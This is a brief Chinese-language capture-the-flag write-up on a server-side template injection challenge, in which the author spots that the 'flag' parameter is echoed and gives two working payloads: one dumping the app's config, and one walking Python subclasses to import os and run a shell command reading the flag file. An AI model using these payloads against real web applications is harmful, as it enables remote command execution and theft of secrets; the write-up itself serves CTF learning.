天命：相信自己

一打开题目就告诉你输入flag参数，而且你输入什么就输出什么

输入：1  输出：1

很明显就是模板注入，Python的web框架独有的漏洞

那就简单，去查一下payload，一把梭

学习可以看这篇文章：https://www.cnblogs.com/tuzkizki/p/15394415.html

原理也不解释，就是拿poc一把梭
 

# flag在配置文件里
第一关是：flag={{config}}  # 命令执行
第二关是：flag={{"".__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__import__('os').popen('cat%20flag').read()}}